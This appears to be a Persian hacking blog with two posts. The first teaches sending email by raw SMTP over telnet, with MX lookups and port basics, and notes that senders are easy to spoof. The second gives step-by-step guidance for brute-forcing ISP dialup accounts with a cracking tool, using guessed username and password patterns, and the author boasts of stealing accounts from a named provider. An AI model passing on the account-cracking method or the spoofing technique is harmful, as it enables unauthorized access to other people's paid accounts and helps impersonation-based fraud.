زدن Enter  دوم است. در عکس بالا فقط Subject  وارد شده است. نمونه کاملتري که شامل To  و From  مي باشد به صورت زير است:

data
354 ok, send it; end with .
From: Leyli@masalan-ye-sity.com
To: Majnoon@hamsafar.com
Subject: Salam!

In email faghat be ghasde azmayesh ferestade shode ast.
Rooze khooby dashte bashid
.
250 Message queued 

به تفاوت اين دو مورد در عکس زير توجه کنيد:

توجه کنيد که همسفر فقط به شما اجازه خواهد داد به آدرسهايي که به hamsafar.com  ختم مي شوند ايميل بزنيد. اگر تمايل به خريد ايميل روي همسفر (webmail & pop3) را داريد، با ما به آدرس sales@hamsafar.com  مکاتبه کنيد. اما دستوراتي که گفته شد روي هر ميزباني کار خواهد کرد. به احتمال زياد جايي که از آن اينترنت گرفته ايد اگر درخواست ايميل POP3  از آنها بکنيد به رايگان به شما خواهند داد و شما آدرسي که به عنوان SMTP  يا Outgoing server  از آنها دريافت مي کنيد را به جاي mail.hamsafar.com  خواهيد نوشت. در هر صورت شما اين اجازه را داريد که با روش فوق با من به آدرس ehssanr@hamsafar.com  مکاتبه کنيد و به اين شکل روش را آزمايش کنيد. به ياري خدا در شماره آينده با آموزش نحوه نصب و استفاده از ميزبان SMTP  خود ويندوز XP، خواهيد آموخت که چگونه بي نياز از هر SMTP  ايميل بفرستيد. حالا که به اينجا رسيديم اميدوارم اين سه سوال براي شما پيش آمده باشد که اگر جوابشان را هم مي دانستيد که هيچ وگرنه ما به آنها جواب مختصر و مفيد خواهيم داد. اگر هم هيچ سوالي برايتان پيش نيامده اين قسمت را باز هم به دقت بخوانيد چرا که مهمترين مفاهيم را به سادگي توضيح داده ايم. باز هم تاکيد مي کنم که اين سه سوال و پاسخ آنها را با دقت بخوانيد و بفهميد.
چند نکته مهم :
سوال : اسم Target  که در قالب Telnet target port  مطرح کرديم چيست و چرا برخي به جاي آن  4  تا عدد مي زنند؟
پاسخ: هر کامپيوتر روي اينترنت با  4  عدد بين  0  تا  255  که با نقطه از هم جدا مي شوند مشخص مي شود. در XP  براي فهميدن IP  خود کافي است که روي مانيتورهاي نشاندهنده اتصال شما به اينترنت دابل کليک کنيد و از بالاي پنجره ظاهر شده با انتخاب قسمت جزئيات (Details) آدرس IP  خود را خواهيد ديد.(براي کساني که ويندوز قديمي دارند معمولا يک راه مناسب تايپ کردن winipcfg  در پنجره Run  و فشردن Enter  است). حال وقتي که کسي يک Domain  ثبت مي کند، در واقع روي اين عددها يک اسم مي گذارد. اين کار دو فايده اساسي دارد. يکي اينکه اگر عدد فرد به هر دليل عوض شود لازم نيست دوباره به همه خبر دهد و دليل ديگر آن اين است که اسم ساده تر به خاطر سپرده مي شود و احتمال اشتباه در آن کمتر است. همانطور که مي بينيد تشبيه IP  به شماره تلفن تا حدي به فهم آن کمک خواهد کرد. در اينجا قصد نداريم وارد بحث دقيق IP  بشويم اما دو عدد اول IP  حتما به اينکه از کجا اينترنت داريد مربوط است و به طور تئوري با داشتن IP  شما مي توان مکان شما را به صورت فيزيکي هم در روي کره زمين مشخص کرد. براي دانستن IP  يک سايت کافي است که از داخل Command Prompt، دستور Ping  را اجرا کنيد. به سادگي تايپ کنيد Ping yahoo.com  يا Ping hamsafar.com  تا IP  را ببينيد. پس حالا ديديد که در واقع منظور از Target  شماره آن کامپيوتري است که قصد داريد به آن متصل شويد.
(مفهوم Port  و کمي از پروتکل Telnet:)
سوال : اصطلاح port  که در قالب Telnet target port  مطرح کرديم چيست و چرا ما آنرا برابر  25  گرفتيم؟ اگر جاي آن را خالي بگذاريم چه مي شود؟
ترجمه کلمه port  به فارسي "بندر" مي شود. کامپيوتر مقصد را به صورت جزيره اي تصور کنيد که چندين بندر دارد و هرکدام تخصص خاص خود را دارند. يکي براي نفتکشهاست يکي براي صادرات سنگ معدن و... . Port  روي کامپيوتر هم در حقيقت همچين مفهومي داره. Port  کامپيوتر جايي است که اطلاعات مي توانند از آن خارج يا به آن وارد شوند. کيبورد، پرينتر، نمايشگر و مودم از پورتهايي هستند که به راحتي از آنها درک فيزيکي داريد اما پورتهاي مجازي توسط نرم افزار ايجاد مي شوند. وقتي پورت مودم شما به اينترنت متصل مي شود، کامپيوتر شما مي تواند هر کدام از پورتها را که تعدادشان بيش از  65000  عدد است ببندد يا باز بگذارد و نيز مي تواند به هر کدام از اين پورتهاي يک کامپيوتر ديگر متصل شود (البته در صورتي که آن کامپيوتر بر روي اين پورت چيزي در حال اجرا داشته باشد و نيز ديوارآتش (firewall) آن را نبسته باشد. (در ويندوز XP  هنگامي که اينترنت خود را تنظيم مي کنيد اين امکان را به شما مي دهد که با استفاده از ديوار آتش جلوي نفوذ ديگران به شما را بگيرد که به طور پيش فرض خودش آنرا فعال مي کند). پورتهاي خاص کاربردهاي خاص دارند. پورت  25  معمولا براي SMTP  (مخفف Simple mail transfer protocol  ) است و ما براي ارسال ايميل از آن استفاده کرديم. اگر قصد دريافت ايميلهايمان را داشتيم به چورت  110  سر مي زديم، براي مشاهده صفحات وب به سراغ پورت  80  مي رويم و... (درست حدس زديد! Outlook  هم به طور پيش فرض براي ارسال ايميل از پورت  25  و براي دريافت آن از پورت  110  استفاده مي کند و اينترنت اکسپلورر هم به پورت  80  شماره IP  آدرس سايتي که مي نويسيد سر مي زند.) و در پايان اگر پورت را ننويسيد، پورت برابر  23  فرض مي شود که پورت Telnet  است. به پاسخ سوال اول دوباره سر بزنيد. وقتي روي لينکي که داده ام کليک مي کنيد در حقيقت به پورت  23  آن ميزبان متصل مي شويد. امروزه بسياري از سايتها بخصوص سايتهايي که از ميزباني ويندوزي استفاده مي کنند سرويس Telnet  ندارند و امکان اتصال به پورت  23  وجود ندارد اما من باز هم توصيه مي کنم که براي تجربه Shell Account  هم که شده Telnet  واقعي را تجربه کنيد. اين Telnet  در حقيقت معمولا يک BBS  هم هست اما امکانات بسيار زيادي هم براي يک هکر دارد. براي آشنايي اوليه صرف اينکه کمي انگليسي بفهميد و هرموقع گير کرديد تايپ کنيد Help  و Enter  کنيد بايد کافي باشد.
سوال :آدرس مورد استفاده در Telnet  براي سايتهاي مختلف را چگونه پيدا کنيم؟
پاسخ:اگرچه بسياري از سايتها از همان mail.domain-name.com  استفاده مي کنند، اين امر همه گير نيست. در ويندوز و با استفاده از cmd.exe  خودمان به راحتي مي توانيم اين آدرس را براي  99% دومينها تعيين کنيم. پس از اجراي cmd، دستور nslookup  را با تايپ کردن اين کلمه و فشردن Enter  اجرا کنيد. از آنجايي که ما قصد گرفتن اطلاعات در مورد سامانه دريافت ايميل آن سايت را داريم، از کد mx  که مخفف mail exchanger  است استفاده مي کنيم. به طور کلي اطلاعات يک domain  شامل چند قسمت است که براي مورد ما فقط اين اطلاعات مورد نياز است. پس تايپ کنيد set q=mx  و Enter  را فشار دهيد. حال کافي است نام domain  را تايپ و Enter  کنيد.
در برخي موارد مانند مثال زير فقط يک جواب مي گيريد:
> irib.com
Server: UnKnown
Address: 213.165.123.1

irib.com MX preference = 60, mail exchanger = mail.irib.com
mail.irib.com internet address = 62.220.119.60 
و يا مثال زير:

irna.com MX preference = 10, mail exchanger = irna.com
irna.com nameserver = ns1.gpg.com
irna.com nameserver = ns1.irna.net
irna.com nameserver = ns1.simorgh.com
irna.com nameserver = ns2.irna.net
irna.com internet address = 209.1.163.101
ns1.irna.net internet address = 217.25.48.18
ns1.irna.net internet address = 194.126.61.8
ns2.irna.net internet address = 194.126.61.7
ns2.irna.net internet address = 217.25.48.17 
که نشان مي دهد براي آدرس irib.com  بايد از mail.irdir.com  استفاده کرد و براي آدرس irna.com  بايد از irna.com  استفاده کرد. به قسمت قرمز رنگ دقت کنيد. هميشه پاسخ مورد نظر ما بعد از عبارت mail exchanger  قرار مي گيرد. گاهي تعداد جوابها بيشتر است:
hamsafar.com MX preference = 10, mail exchanger = mail.hamsafar.com
hamsafar.com MX preference = 15, mail exchanger = hamsafar.com
mail.hamsafar.com internet address = 38.118.143.98
hamsafar.com internet address = 38.118.143.98 
و يا مثال زير:
hotmail.com MX preference = 5, mail exchanger = mx4.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx1.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx2.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx3.hotmail.com
hotmail.com nameserver = ns1.hotmail.com
hotmail.com nameserver = ns2.hotmail.com
hotmail.com nameserver = ns3.hotmail.com
hotmail.com nameserver = ns4.hotmail.com
mx4.hotmail.com internet address = 65.54.254.151
mx4.hotmail.com internet address = 65.54.253.230
mx1.hotmail.com internet address = 65.54.254.129
mx1.hotmail.com internet address = 65.54.252.99
mx1.hotmail.com internet address = 65.54.166.99
mx2.hotmail.com internet address = 65.54.254.145
mx2.hotmail.com internet address = 65.54.252.230
mx2.hotmail.com internet address = 65.54.166.230
mx3.hotmail.com internet address = 65.54.254.140
mx3.hotmail.com internet address = 65.54.253.99
ns1.hotmail.com internet address = 216.200.206.140
ns2.hotmail.com internet address = 216.200.206.139
ns3.hotmail.com internet address = 209.185.130.68
ns4.hotmail.com internet address = 64.4.29.24 
و يا مثال زير:
cnn.com MX preference = 10, mail exchanger = atlmail4.turner.com
cnn.com MX preference = 20, mail exchanger = atlmail2.turner.com
cnn.com MX preference = 30, mail exchanger = nymail1.turner.com
cnn.com MX preference = 10, mail exchanger = atlmail1.turner.com
cnn.com nameserver = twdns-04.ns.aol.com
cnn.com nameserver = twdns-01.ns.aol.com
cnn.com nameserver = twdns-02.ns.aol.com
cnn.com nameserver = twdns-03.ns.aol.com
atlmail1.turner.com internet address = 64.236.240.146
atlmail4.turner.com internet address = 64.236.221.5
atlmail2.turner.com internet address = 64.236.240.147
nymail1.turner.com internet address = 64.236.180.95 
اگر کمي دقت کنيد، قسمت MX preference  همواره داراي يک عدد است. اگر جوابهاي متفاوتي پيدا شد، جوابي که عدد MX preference  آن کمتر باشد به طور معمول انتخاب مناسبتري است و بايد اولين جوابي باشد که امتحان مي کنيد. با اين روش شما مي توانيد بدون استفاده از SMTP  خاصي ايميلهاي خود را ارسال کنيد يا برنامه اي بنويسيد که ايميل ارسال کند. سوالي که در اينجا پيش مي آيد اين است که چه کارهايي در اين زمينه مجاز و چه کارهايي غيرقانوني است. فرستادن ايميل به هزاران نفر طوري که به هر کدام فقط يک ايميل برسد و آنها راهي براي خروج از ليست شما داشته باشند غيرقانوني نيست اما ممکن است ISP  يا Host  شما را عصباني کند، بنابراين بهتر است از آنها سوال کنيد يا حداقل مطمئن باشيد که در قراردادي که با آنها امضا کرده ايد ممنوعيت اين مورد ذکر نشده باشد. البته اگر اين ايميل طوري فرستاده شود که فرستنده آن صحيح نباشد و به نظر برسد که از طرف کس ديگري آمده است قابل پيگرد قانوني است و افراد زيادي در دنيا به اين دليل محاکمه شده اند. فرستادن چندين ايميل به يک فرد طوري که سبب مزاحمت وي يا از دست رفتن برخي از اطلاعات وي شود جرو است و از طريق مراجع ذيصلاح قابل پيگرد قانوني مي باشد. فرستادن ايميل طوري که به نظر برسد از آدرسي ديگر آمده است، اگر آن آدرس ديگر متعلق به شما نباشد علاوه بر غير اخلاقي بودن عمل، انشاءالله قابل پيگيري قانوني مي باشد. از توضيح نصب و کار با SMTP  روي ويندوز شخصي منصرف شديم، اما همين قدر بدانيد که از control panel-> add/remove programs  بايأ به قسمت add/remove windows components  برويد و از آنجا IIS  و Message queuing  را نصب کنيد و سپس در صورت نياز آنها را تنظيم کنيد. به اين شکل شما قادر به فرستادن ايميل با telnet  کردن به آدرس localhost  يا آدرس IP 127.0.0.1  به هر آدرسي خواهيد بود. اميدوارم بعد از خواندن اين صفحات به اين نتيجه رسيده باشيد که هرکسي به راحتي مي تواند هر ايميلي را از طرف کس ديگري براي شما ارسال کند و در مورد ايميلهاي مشکوک بايد احتياط کنيد. البته مشکلات ايميل به اينجا ختم نمي شود... ايميل را به طور معمول به کارت پستال بدون پاکت تشبيه مي کنند به اين مفهوم که در مسير رايانه شما به رايانه گيرنده نامه در تمام مسيرهاي مياني و توسط پستچيها قابل خواندن است! اگرچه متاسفانه در ايران به دليل اهميت ندادن به امنيت اطلاعات، تمامي مکالمات تلفني (بخصوص تلفن همراه)، فکس و مانند آنها هم همين حکم را دارند و در مقايسه وضع ايميل کمي بهتر است (بعد بگيد چرا تجارت الکترونيکي نداريم... يا بگيد چرا بانکها خودشون برا خودشون شبکه راه مي اندازند يا...)!
سوال :جگونه مي شود به يک پورت باز telnet  کرد؟
پاسخ:براي اينکه عملکرد يک پورت براي شما روشن شود، بايد به آن پورت Telnet  کنيد.البته معمولا تعدادي از پورتهايي را که ممکن است اطلاعاتي مهم را در اختيار هکرها قرار دهند مثل پورت  ۷۹  يا  ۸۰  معمولا بسته است و ارتباط با آنها شايد برقرار نشود. براي telnet  کردن در command prompt  دستور زير را تايپ کنيد:
telnet hostname portnum 
در اين دستور بهجاي hostname  شماره ip  و يا نام سايت را وارد ميکنيد و بهجاي portnum  شماره پورت توجه کنيد که فقط در صورتي ميتوانيد با يک پورت تلنت کنيد که ان پورت open  باشد .
مثلا براي تلنت کردن به پورت  ۱۳  که ساعت و تاريخ را بهدست ميدهد در کامپيوتري با IP :
۱۹۲.۱۶۸.۱۰۰.۳۵  مينويسيد:
telnet 192.168.100.35 13 
يا اگر ip  سايت مورد نظر رو بلد نبوديد (بعد روش بدست اوردن ip  رو هم ميگم) ميتوانيد از اين راه استفاده کنيد:
telnet yahoo.com 13

منبع : alisoft.per.... .com                                                                                         hack

+ نوشته شده توسط ZeroCooL® در دوشنبه هفتم آذر 1384 و ساعت 7:34 |

اين كار اون طور كه شما فكر ميكنيد پيچيده نيست
فقط احتياج به يه فايل داريدكه حجمش 270 كيلو بايته من تا يه كي دو روز پيش
لينك مجاني اين فايلو ميدونستم ولي گمش كردم ولي شما اگه اين فايلو ميخوايد
فقط اين پايين بگيد و ايميلتونم بزاريد در اولين زماني كه حسم امد براتون
ميفرستم حالا هي بگو مهيار بد اكه به من لينك زده باشيداستثنان تو كمتر از 1 روز واستون ميفرستم حالا وقتي فايلو گرفتيد چندين قسمت ميبينيد كه من يكي يكي اونارو توضيح ميدم
در قسمت  computer
name or ip
آي پي و يا سايت اون آي سي پي كه مي خوايد ازش اكونت دودر كنيد و بنويسيد
مثل البرز كه من چنتا اكونت تونستم ازش بدست بيارم در قسمت پورت هم 21 رو مينويسيد كه
البته از پورت 79 هم ميتونيد استفاده كنيد البته اگه باز بود در قسمت   curent password
كاري نداشته باشيد كه محل پسورد كشف شده است در قسمت يوزرنيم شما بايد يه
يوزر حدس بزنيد كه كار زياد سختي نيست چون تمام اي سي پي ها از يه رنج
خاصي استفاده ميكند مثلا شركت ايكس تمام يوزراشو به اين صورت
tech1234a
tech3424a
tech3255a
tech3333a
tech2341a
است كه اينجا بستگي به مهارت هكري خودتون داره در قسمت
dictionary file
هم ادرس يه پس ليست از كامپيوترتون ميديد كه اين پسوردها رو هم بايد
خودتون درست كنيد با فايل ديكشنري ميكر كه در انتخاب پسوردها هم بايد طبق رنج اي سي پي عمل كنيد مثلا شركت ايكس تمام پسورداش به اين صورت است
m3244m
m3456m
m7565m
m6533m
m3245m
پس همونطور كه ميبينيد به اين راحتي نيست كه يه دكمه رو فشار بديدو
فايل يه اكونت بزار كف دستتون بايد شم هكرتونو به كار بندازيد
خوب در قسمت   attack
option
هر 4 گزينه رو كليك كنيد در قسمت
brute furce option
مشخص ميكنيد كه فايل چطوري دنبال پسورد بگرده مثلا حرف اول اون با عدد يا حرف
شروع ميشه يا تعداد حروف پسورد چندتاس و غيره در پايان هم كانكتو ميزنيم
و منتظر ميشيم تا فايل پسوردو پيدا كنه اگه مشكل پيدا كردي بگوالبته اين يكي از روشهاي هك كردن اي سي پي هستش كه اگه تونستم روشهاي ديگه رو كه كمي پيشرفته تر هستشو ميگم

+ نوشته شده توسط ZeroCooL® در چهارشنبه دوم آذر 1384 و ساعت 22:57 |